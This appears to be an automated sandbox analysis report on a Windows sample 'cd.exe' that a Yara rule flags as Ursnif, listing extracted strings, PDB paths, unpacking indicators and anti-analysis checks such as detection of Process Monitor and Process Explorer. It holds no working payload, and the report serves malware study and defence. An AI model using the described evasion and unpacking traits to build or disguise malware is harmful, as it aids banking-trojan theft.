              Source: cd.exeBinary string: Gbad array new lengthmap/set too longstring too longVersionMajor{AC76BA86-0000-0000-7760-7E8A45000000}InstallLocationAcrobat\Acrobat.exeiEntitlementLevelbLoginStatusTrunkBetaDC\AVEntitlementSOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorVersionMinorInstallLocationAcrobat\Acrobat.exe#32770Learn MoreOkMsgBoxHookMsgBoxHookMsgBoxHookMsgBoxHook0x%XS:(ML;;NW;;;LW)rdrCEF_alternate_desktop_alr_alternate_desktop_rdrCEF_alternate_desktop_alr_alternate_desktop_\S-1-16-4096S:(ML;CIOI;NW;;;LW)TMP=TMP=TEMP=TEMP=LOCALAPPDATA=LOCALAPPDATA===invalid string positionvector too longSOFTWARE\Adobe\Adobe Acrobat\DC\Installer\bIsSingleClientAppbIsSCAcroAppInstalledSCAPackageLevelIsAcrInstalledInRdrModeSeShutdownPrivilegekernel32.dllGetNamedPipeServerProcessIdGetNamedPipeClientProcessIdS:(ML;;NW;;;LW)D:P(D;;GA;;;NU)(D;;GA;;;AN)(A;;GA;;;)(A;;GA;;;AC)\\.\pipe\AIPC_SRV\\\.\pipe\AIPC_CLI\Global\IEACROBATSTARTIPCNAMEDPIPECOMGlobal\ARM Update MutexGlobal\Acro Update MutexC:\thsnYaVieBodaTsnIorcAeBoda\\.\pipe\32B6B37A-4A7D-4e00-95F2-6F0BF3DE3E00SOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockDownbEnableEventViewerLoggingSoftware\Adobe\Acrobat Reader\DC\PrivilegedbEnableEventViewerLoggingAdobe ReaderDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsHandleAcroURLAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exe\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\list too 
long4057363broker_pdfshell_sh/if/id %uAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exe\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Software\Adobe\Acrobat Reader\DC\FeatureStateSoftware\Adobe\Adobe Acrobat\DC\FeatureStateatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClient\??\\Device\atlTraceDBProvider\\?\UNC\\??\UNC\/?/UNC/atlTraceSnapin\?\UNC\\??\pipe\\??\mailslot\atlTraceNotImpl\\?\\\.\\\atlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPIAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeSMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLib%d.%u.%d/cr/bSOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockdownbEnforceReadRestrictionsSOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockdownbEnableAlternateLaunchDesktopSoftware\Adobe\Adobe
              Source: cd.exeBinary string: Software\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Acrobat /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770/\ADelRCP.exeClick on 'Change' to select default PDF handler.pdfpropertiesShowAppPickerForPDF.exeProgram ManagerPROGMANClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfApplicationSOFTWARE\Adobe\Adobe Acrobat\{A6EADE66-0000-0000-484E-7E8A45000000}SOFTWARE\Adobe\Acrobat Reader\{AC76BA86-0000-0000-7761-7E8A45000000}{AC76BA86-0000-0000-7760-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-BA7E-7E8A45000000}VersionMajorVersionMinor12VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\.0\InstallerPATHVersionMajorVersionMinor1207760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat 
Reader\.0DC\InstallerENU_GUIDPATHInstallLocationAcrobat.Document.DC.pdfTrunk{AC76BA86-0000-0000-7760-7E8A45000000}BetaDCVersionMajorSOFTWARE\Google\Chrome\SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajSOFTWARE\Google\Chrome\NativeMessagingHosts\com.adobe.acrobat.chrome_webcapturehttps://clients2.google.com/service/update2/crxupdate_urlBrowser\WCChromeExtn\manifest.jsonAcrobat.Document.SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajAcrobat.Document.11.pdfSOFTWARE\Google\Chrome\NativeMessagingHosts\.com.adobe.acrobat.chrome_webcaptureSOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorLowerCoExVersionSOFTWARE\Adobe\Adobe Acrobat\DC\InstallerCoExRepairDone\RDCNotificationAppx\ADCNotificationAppx\NotificationAppxSOFTWARE\Adobe\Adobe Acrobat\\DC\SOFTWARE\Adobe\Adobe Acrobat\\DC\Installer\AppVersionAppVersionINSTALLUWPAPP=1 REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 IS_COEX_REPAIR=1 /qn/i msiexec.exe/i AppDoNotTakePDFOwnershipAtLaunch ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qnmsiexec.exeAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstore.sequ.rmf.bpdxAdobe Acrobat XI ProRtlGetVersionntdll.dll\??\UNC\\\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Dev
              Source: cd.exeBinary string: O 3Eg_interceptionsNtMapViewOfSectionNtUnmapViewOfSectiong_originals\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Invalid Object foundD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\filesystem_policy.ccrequested path: actual path: Unexpected handle for path: Unexpected handle\/?/?\?:?:\\/?/?\UNC\Failed to process path (recursion detected): error code:Failed to process path:Unexpected error in path processing of:Unexpected error in source path processing of:::$DATA:$I30:$INDEX_ALLOCATION::$INDEX_ALLOCATION\\.\pipe\\\.\mailslot\Invalid path: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\\?\pipe\\Device\NamedPipe\SameObject check failed: D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\named_pipe_policy.ccntdll.dllkernel32.dllNtAllocateVirtualMemoryNtCloseNtDuplicateObjectNtFreeVirtualMemoryNtProtectVirtualMemoryNtQuerySectionNtQueryVirtualMemoryNtSignalAndWaitForSingleObjectNtWaitForSingleObjectRtlAllocateHeapRtlAnsiStringToUnicodeStringRtlCreateHeapRtlCreateUserThreadRtlDestroyHeapRtlFreeHeap_strnicmpstrlenwcslenmemcpy_wcsnicmpswprintf_sNtQueryInformationThreadNtSetInformationFileNtDeleteValueKeyNtCreateMutantNtOpenMutantNtOpenSectionNtAddAtomNtFindAtomNtDeleteAtomNtQueryInformationAtomg_ntNtSetInformationThreadNtOpenThreadTokenNtOpenThreadTokenEx\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\NtSuspendProcessNtResumeProcessNtCreateProcessExntdll.dllInitializeProcThreadAttributeListUpdateProcThreadAttributeCreateProcessWAction: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\process_thread_policy.ccapp name: command line: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ for: Unexpected 
D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\registry_policy.ccReal path: CreateKeyOpenKey\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Handle AccessCheck failed: D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\signed_policy.cc\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\NtQuerySymbolicLinkObjectNtOpenSymbolicLinkObject%d\Sessions\BNOLINKSNtCreateEventNtOpenEvent\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Ntdll.dllNtQueryInformationProcessSTATIC_acroS_winAcroPDF.dllAcroPDFImpl.dllNPPdf32.dllPDFPrevHndlr.dllPDFPrevHndlrShim.dllPDFThumbHndlr.dllPDFShell.dllPDFPropHndlr.dllAcroSBL/b/id/id4057363/if%s_%lu_%lu/acGeckoPluginWindowplugin-container.exe4021007AcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeSTATICswBrowser|rdr|\Javascripts\JSByteCodeWin.bin|rdr|\AdobeUpdater.dll|sys|\ddraw.dll|sys|\dciman32.dllAdobeReaderSpeedLaunchCmdWndSOFTWARE\Adobe\Acrobat Reader\DC\AcroSpeedLaunchAcrobatSDIWindowAdobeAcrobatAcrobatTimerWndAcrobat runningMcShieldAvSynMgrnavapsvcAntiVirServiceAVPekrnIsVirusCheckerPresentServicesActivefound servicerunningIsVirusCheckerPresent doneAbortWM_CLOSEerr in TimeoutOrExitWaitUntilTimeoutOrMustExitOrVirusCheckerPresenterr in checkerSetThreadPriority worker thread lownot all ops, go into vc modewaitingmsvcr100.dllmsvcp100.dlldo Opsworker throw!worker doneTerminate thread!
              Source: classification engine Classification label: mal100.spre.troj.evad.winEXE@4/27@6/5
              Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
              Source: cd.exeString found in binary or memory: /cite/word/install
              Source: cd.exeString found in binary or memory: Couldn't find documents: You have selected documents from both My Library a Shared Group, or from multiple Shared Groups, which is not supported.Documents in multiple groupsPlease select the documents you wish to cite.importing %1 documents from plugin into ??geometry/newLibrarySplittergeometry/horizontalSplittergeometry/verticalSplitterSynchronizing - Step %1 of %2GroupFilterCollectionDeletedFilter1trigger()Synchronizing Zotero - Step %1 of %22duplicateSearchStarted(WorkerJob::Pointer)1highlightAndScrollTo(QList<Document::Pointer>)2allJobsFinished(QList<Document::Pointer>)Invite/invite/?dgcid=Mendeley_Desktop_Invite-colleagues/cite/word/install/importshowSignInmendeley://loginshowJoinMendeleyFormmendeley://registerDelete this document from your library?Delete %1 documents from your library?
              Source: cd.exeString found in binary or memory: https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guides
              Source: cd.exeString found in binary or memory: 1openHelpGuides()Help Guides1openMendeleyWebsite()Mendeley Website1openFAQ()FAQ1openContactSupport()Contact SupportCheck for UpdatesCheck Now1toggleCheckForPreviewUpdates()Create Backup...1openMendeleyPrivacyPolicy()Privacy Policy1openMendeleyTandCs()Terms and Conditions1showAbout()https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guideshttps://www.mendeley.com?dgcid=Mendeley_Desktop_Help-menu-websitehttps://www.elsevier.com/legal/elsevier-website-terms-and-conditionshttps://www.elsevier.com/legal/privacy-policyhttps://service.elsevier.com/app/home/supporthub/mendeley/?dgcid=Mendeley_Desktop_Help-menu-FAQhttps://service.elsevier.com/app/contact/supporthub/mendeley?dgcid=Mendeley_Desktop_Help-menu-Contact-SupportOpt-out of Experimental ReleasesOpt-in to Experimental Releases
              Source: cd.exeString found in binary or memory: recently-added
              Source: cd.exeString found in binary or memory: 1timeout()1showDocumentView()all-documentsrecently-addedmy-publicationsfavoritesfavouritesunsortedselectExistingGroupByIdactiongroupIdtabNameoverviewmembersInvalid group tab namefailed to select group1syncProgressChanged(QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>)2progressChanged(QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>,QSet<SynchronizeJob::Action>)1updateRecentlyRead()selectExistingDocumentByIdidfileToOpenselectExistingFolderByIdfolderIdcan't fetch unknown document No document found matching the id1showStyleError(StylesFetcher::DownloadFromUrlError,QString)1selectStyle(QString)Style selected - %1Cannot install - %1. Error: %2No folder found matching the remote idMainWindowController::selectFilterByName: Can't find the filter showDocumentViewsetDocumentPropertiesPaneVisibilityselectMetadataTabselectTagsAndNotesTabselectFilterBySlugselectFilterByNameselectDocumentRowselectMainTabselectDocumentByIdselectGroupByIdH
              Source: cd.exeString found in binary or memory: :/images/onboarding/bubbles/add_copy.png
              Source: cd.exeString found in binary or memory: Try Mendeley <a href="https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-Importer"><b>Web Plugin</b></a> to import documents in just one click
              Source: cd.exeString found in binary or memory: <html><head/><body><p><a href="https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">Cite</span></a> your Mendeley references in Microsoft Word<sup>&reg;</sup> or LibreOffice<sup>&trade;</sup></p></body></html>
              Source: cd.exeString found in binary or memory: <html><head/><body><p>Discover how to <a href="https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">highlight and annotate</span></a> documents in your library</p></body></html>
              Source: cd.exeString found in binary or memory: :/images/onboarding/bubbles/next.pngAdd and CreateUserGuidePopoverWidgetHide the Guidance PopupAlt+CClick here to <b>import</b> documents and folders to your library or <b>create new</b> entries manually.or importImport other librariesTry Mendeley <a href="https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-Importer"><b>Web Plugin</b></a> to import documents in just one clickYour Mendeley Library is backed up to the Mendeley Cloud every time you sync so you can access it on Mendeley Web Library, Mendeley Mobile or other installations of Mendeley Desktop. You can manage synchronization of your file attachments here.Click the help button to find out more about Mendeley and learn how to cite, annotate and collaborate.Learn how to<html><head/><body><p><a href="https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">Cite</span></a> your Mendeley references in Microsoft Word<sup>&reg;</sup> or LibreOffice<sup>&trade;</sup></p></body></html><html><head/><body><p>Discover how to <a href="https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboarding-Help-Cite"><span style=" font-weight:600; text-decoration: underline; color:#0000ff;">highlight and annotate</span></a> documents in your library</p></body></html>QPushButton:pressed { border: 1px solid white; background: white; color: white; opacity: 255; }QPushButton:pressed { border: 1px solid #F6F6F6; background: #F6F6F6; color: white; opacity: 255; }UserGuidePopover1trackButtonClick()1page0AltContentBiTeXButtonClicked()1page0AltContentEndNoteButtonClicked()1page0AltContentRISButtonClicked()1display()2displaySignal():/images/onboarding/bubbles/next.png:/images/onboarding/bubbles/close-button.pngStorage: Local & CloudThe help button will always be 
hereUserGuidePopover_Page%1unverifiedH
              Source: cd.exeString found in binary or memory: Please upgrade to a supported version of MS Word and re-install the Mendeley plugin through Mendeley Desktop's 'Tools' menu. Sorry for the inconvenience.
              Source: cd.exeString found in binary or memory: 1updateWordPlugin()1uninstallWordPlugin()Please upgrade to a supported version of MS Word and re-install the Mendeley plugin through Mendeley Desktop's 'Tools' menu. Sorry for the inconvenience.The Mendeley plugin requires Microsoft Word %1 or later.
              Source: cd.exeString found in binary or memory: documents-add
              Source: cd.exeString found in binary or memory: folder-add
              Source: cd.exeString found in binary or memory: 333?editMenuSeparatorviewerActions.selectionMenuviewerActions.highlightMenuviewerActions.zoomModeMenudocuments-addAddnewDocumentActionImport additional documents to the current collectionaddFilesActionaddFolderActionWatch FolderwatchFolderActionAdd Entry ManuallyaddManualEntryActionemptyEmptyemptyTrashActionDelete all documents from the Trashdocument-deleteremoveDocumentActionMove the selected documents to the TrashremoveDocumentActionTrashContextDelete the selected documents from the TrashrestoreRestoreRestore DocumentsrestoreDocumentActionRestore the selected documents to their original locationRemove from FolderremoveFromFolderActionRemove the selected documents from this folderRename Document Files...renameDocumentActionfolder-addCreate FolderNew Folder...newFolderActionCreate a new folderNew GroupNew Group...newGroupActionCreate a new groupfolder-removeRemove CollectionRemoveCollectionActionRemove the current collectioneditSettingsActionRename Collection...renameFolderActionmagnifiercatalogSearchActionMendeley Catalog Searchrelated-documentsRelatedrecommendActionRecommend related documentsSyncSynchronize LibrarysynchronizeActionSynchronize your library with Mendeley WebHelpHelp ContentshelpActionOpen the Online Help Guide for MendeleyFindfindActionFind NextfindNextActionFind PreviousfindPreviousActionselectAllActionciteCitesendCitationActionSend citation to plugincancelcancelCitationActionCancel sending citation to pluginEdit...editDocumentActionactionNotDuplicatesUpdate DetailslookupMetadataActionfullscreenFullscreenfullScreenActionzoomActionzoom-inZoom InzoomInActionzoom-outZoom OutzoomOutActionrotate-leftRotate LeftrotateAnticlockwiseActionrotate-rightRotate RightrotateClockwiseActionpanPanpanActionfit-pageFit to PagezoomModeFitPageActionfit-widthFit to WidthzoomModeFitWidthActionzoomModeCustomselectActionselect-rectangleSelect RectangleselectRectangleActionselect-textSelectSelect 
TextselectFlowActionColorSelect ColorselectColorActionhighlightActionhighlight-textHighlightHighlight TexthighlightTextActionhighlight-rectHighlight RectanglehighlightRectangleActionnoteNoteAdd NoteaddNoteActioncopyActionpasteAction:/icons/64x64/actions/%1/%2.png:/icons/toolbar/%1/%2.png:/icons/toolbar/%1/%2-active.png:/icons/16x16/actions/%1.png
              Source: cd.exeString found in binary or memory: The service logs events immediately and the driver installs as a boot-start driver to capture activity from early in the boot that the service will write to the event log when it starts.
              Source: cd.exeString found in binary or memory: Try '%ls --help' for more information.
              Source: cd.exeString found in binary or memory: Commands : /install - Installs Steam Client Service
              Source: cd.exeString found in binary or memory: /installscript <file> <appid> - Runs a Steam game install script
              Source: cd.exeString found in binary or memory: /installscript
              Source: cd.exeString found in binary or memory: /installscript failed on: %s: %d
              Source: cd.exeString found in binary or memory: /install
              Source: cd.exeString found in binary or memory: /install service install failed
              Source: cd.exeString found in binary or memory: /setupsteam <command line> - Runs SteamSetup.exe/hide/installscript/installscript failed on: %s: %d
              Source: cd.exeString found in binary or memory: /install/install service install failed
              Source: cd.exeString found in binary or memory: /Install
              Source: cd.exeString found in binary or memory: /Stop
              Source: cd.exeString found in binary or memory: /Install/Uninstall/Start/Stop/RunAsService
              Source: cd.exeString found in binary or memory: ,ZJAll AccessRead/WriteExecuteQuery ValueSet ValueCreate Sub KeyEnumerate Sub KeysNotifyCreate LinkWOW64_ResWOW64_32KeyWOW64_64KeyGeneric Read/Write/ExecuteGeneric Read/WriteGeneric Read/ExecuteGeneric Write/ExecuteGeneric ReadGeneric WriteGeneric ExecuteRead Data/List DirectoryWrite Data/Add FileAppend Data/Add Subdirectory/Create Pipe InstanceRead EAWrite EAExecute/TraverseDelete ChildRead AttributesWrite AttributesRead ControlWrite DACWrite OwnerSynchronizeAccess System SecurityMaximum Allowedkernel32.dllSD\fltlib.dll%llx%lf%s%07d%02u:%02u:%02u.%07u%02u:%02u:%02u%I64d0x%I64x-1%I64u KB MB GBWindows 2000Windows XPWindows XP x64Windows Server 2003Windows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 8Windows Server 2012Windows 8.1Windows Server 2012 R2Windows 10Windows Server 2016Windows %d.%d (build %d.%d)%08x:%08x%02X64-bit32-bit%x:%x:%x:%x:%x:%x:%x:%x%d.%d.%d.%d:%d:None
              Source: cd.exeString found in binary or memory: -help
              Source: cd.exeString found in binary or memory: sun/launcher/LauncherHelper
              Source: cd.exeString found in binary or memory: Error: Corrupt jvm.cfg file; cycle in alias list.ERRORError: Unable to resolve VM alias %sWarning: %s VM not supported; %s VM will be usedError: %s VM not supported-version-fullversion-help-?-jar-X-XX:NativeMemoryTracking=%s%d=%s%s%dTRACER_MARKER: NativeMemoryTracking: env var is %s
              Source: cd.exeString found in binary or memory: sun/launcher/LauncherHelper(Z[B)Ljava/lang/String;makePlatformStringjava/lang/String(ZILjava/lang/String;)Ljava/lang/Class;checkAndLoadMain%ld micro seconds to load main class
              Source: cd.exeString found in binary or memory: browser-startup-dialog
              Source: cd.exeString found in binary or memory: enable-service-binary-launcher
              Source: cd.exeString found in binary or memory: gpu-launcher
              Source: cd.exeString found in binary or memory: gpu-sandbox-start-early
              Source: cd.exeString found in binary or memory: gpu-startup-dialog
              Source: cd.exeString found in binary or memory: ppapi-plugin-launcher
              Source: cd.exeString found in binary or memory: ppapi-startup-dialog
              Source: cd.exeString found in binary or memory: renderer-startup-dialog
              Source: cd.exeString found in binary or memory: utility-startup-dialog
              Source: cd.exeString found in binary or memory: gpu2-startup-dialog
              Source: cd.exeString found in binary or memory: --start-crash-handler
              Source: cd.exeString found in binary or memory: QVersionNumbera+CONOUT$--start-crash-handlerRadareOrgCutterQList
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
              Source: cd.exeStatic file information: File size 3922432 > 1048576
              Source: cd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\s\Win32\Release\logonsessions.pdb source: cd.exe
              Source: Binary string: c:\stream\develop\Regionhunt.pdb source: cd.exe
              Source: Binary string: D:\a\1\s\Win32\Release\RamMap.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb))) source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb666 source: cd.exe
              Source: Binary string: C:\agent\_work\93\s\Win32\Release\autoruns.pdb source: cd.exe
              Source: Binary string: D:\a\1\s\Win32\Release\adrestore.pdb source: cd.exe
              Source: Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb source: cd.exe

              Data Obfuscation:

              Detected unpacking (overwrites its own PE header)
              Source: C:\Users\user\Desktop\cd.exeUnpacked PE file: 1.2.cd.exe.400000.0.unpack
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\cd.exeUnpacked PE file: 1.2.cd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;aZAqrnJo:R;BGOllIzc:R;yQtoRARz:R;dZLJZOuu:R;sdDGHbsk:R;cQfsAIeK:R;nJjdtQIB:R;pcHOcQzM:R;wDcvvqlu:R;orXBiygL:R;AiZKCfrK:R;myoGvTPf:R;AVTlzkED:R;bzLENpIH:R;XcYnViEt:R;mbKhPZXg:R;lUpFJlcq:R;yiDSdvAK:R;tWLpgAgw:R;bTGdVUjl:R;ziIDaoXi:R;LzawvTwX:R;LnIDzdzd:R;wkCXpCGo:R;nqpeKqho:R;MRjgEOqy:R;JcLmCXgA:R;OtycdIdu:R;IbVOTdPC:R;FgFHDyjf:R;ybeqBvHg:R;IbzUQYJs:R;AQBgSYnS:R;XxFUmGWX:R;afVQQtfj:R;nwvMTysA:R;ZHPQhgLD:R;pxMMJkwk:R;JXHCNYcJ:R;lYRopDTG:R;bcYTpMaT:R;nuBezWiu:R;yPvpmSBg:R;OoEfGgTM:R;kYRGCWEC:R;ssiFbfZW:R;KHKSQqok:R;NcZcjaDP:R;mIUEylgT:R;lluFjCpP:R;BHqNuAAF:R;dWFkhiaJ:R;NeKPPFmp:R;mRaJxCpw:R;sjZRApAc:R;mJuapRBt:R;AUQwTDRB:R;Mzpcxreq:R;DQLewjlc:R;yQzDovRx:R;KsasGyWE:R;qALhWEsZ:R;EhLKChYp:R;juiuAwmE:R;FPCcnPuO:R;DQPOFovS:R;eeLebknr:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_0040322B push ecx; ret
              Source: initial sampleStatic PE information: section name: .text entropy: 6.93749374769

              Hooking and other Techniques for Hiding and Protection:

              Yara detected Ursnif
              Source: Yara matchFile source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR
              Source: C:\Users\user\Desktop\cd.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: cd.exeBinary or memory string: IIRP_MJ_FASTIO_PROCMON.EXEPROCEXP.EXEAUTORUNS.EXESYSTEMPAGEFILE.SYS$MFT$MFTMIRR$LOGFILE$VOLUME$ATTRDEF$ROOT$BITMAP$BOOT$BADCLUS$SECURE$UPCASE$EXTENDFAST IOINCLUDEEXCLUDE<BAD>OKAY TO OVERWRITE EVENT LOG ''?AN ERROR OCCURRED OPENING THE SNAPSHOT ''APPLYING EVENT FILTEROPERATION CANCELLED: THE LISTVIEW DATA MAY BE INCOMPLETEPROCESS MONITOR CAN OPEN AT MOST BACKING FILES<PAGEFILE>YESNOEVENTPROCESSINDEXSTACKFRAMEDEPTHADDRESS + PATHLOCATIONPROCESSPROCESSIDPARENTPROCESSIDPARENTPROCESSINDEXAUTHENTICATIONIDCREATETIMEFINISHTIMEISVIRTUALIZEDIS64BITINTEGRITYOWNERPROCESSNAMECOMMANDLINECOMPANYNAMEVERSIONDESCRIPTIONMODULELISTMODULETIMESTAMPBASEADDRESSSIZECOMPANYPROCESS MONITOR - EXPORTING EVENT DATAWT, CCS=UTF-8"%S"
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_004359CA mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_0043559C push dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_008004F4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_008000C6 push dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_00401873 GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,NtGetContextThread,NtGetContextThread,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\cd.exeCode function: 1_2_00402F32 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,
